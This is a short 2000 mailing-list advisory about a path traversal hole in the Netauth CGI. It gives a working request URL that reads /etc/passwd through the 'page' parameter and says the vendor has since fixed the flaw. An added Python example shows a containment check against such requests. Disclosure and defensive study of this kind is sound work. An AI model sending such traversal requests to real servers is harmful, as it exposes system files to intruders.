Subject: Netauth: Web Based Email Management System
From: Marc Maiffret (marc EEYE.COM)
Date: Thu Aug 17 2000 - 06:13:06 CDT
This is just a quick note of a simple hole in the Netauth system.
What is Netauth?
Netauth is a web based eMail management system for Windows NT and most Unix
platforms.
What is the hole?
The netauth.cgi file
http://[server]/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
What is the fix?
The Netauth developers (very cool guys) fixed this hole a few months back.
So just go to their website and download the latest version.
Vendor Homepage:
http://netwinsite.com/netauth/
We found this hole while testing CHAM HTTP, few more weeks till release.
http://www.eeye.com/retina
Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.349.9062
F.949.349.9538
http://eEye.com
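
Added example, not part of the original post and not Netauth's code: a server-side containment check for a `page` parameter like the one in the advisory, rejecting any value that resolves outside the directory the CGI is meant to serve. The names PAGE_ROOT, resolve_page and check_request and the directory path are assumptions made for illustration.

```python
import os
from urllib.parse import urlsplit, parse_qs

# Hypothetical directory holding the pages the CGI is allowed to serve.
PAGE_ROOT = "/var/www/netauth/pages"


def resolve_page(page, root=PAGE_ROOT):
    """Return the absolute path for `page` if it stays inside `root`, else None."""
    if not page or "\x00" in page:
        return None
    root_real = os.path.realpath(root)
    # realpath collapses ".." segments and follows symlinks before the check,
    # so the comparison is made on the path the OS would actually open.
    candidate = os.path.realpath(os.path.join(root_real, page))
    # commonpath compares whole components, so a sibling such as
    # /var/www/netauth/pages-old is not mistaken for being inside the root.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    if candidate == root_real:
        return None  # the root directory itself is not a page
    return candidate


def check_request(url, root=PAGE_ROOT):
    """Extract the `page` parameter from a request URL and resolve it."""
    query = parse_qs(urlsplit(url).query)  # parse_qs percent-decodes values
    pages = query.get("page", [])
    if len(pages) != 1:
        return None  # missing or repeated parameter: refuse rather than guess
    return resolve_page(pages[0], root)
```

The check is applied after decoding and canonicalisation, so plain, percent-encoded and absolute-path forms of the same request are all refused.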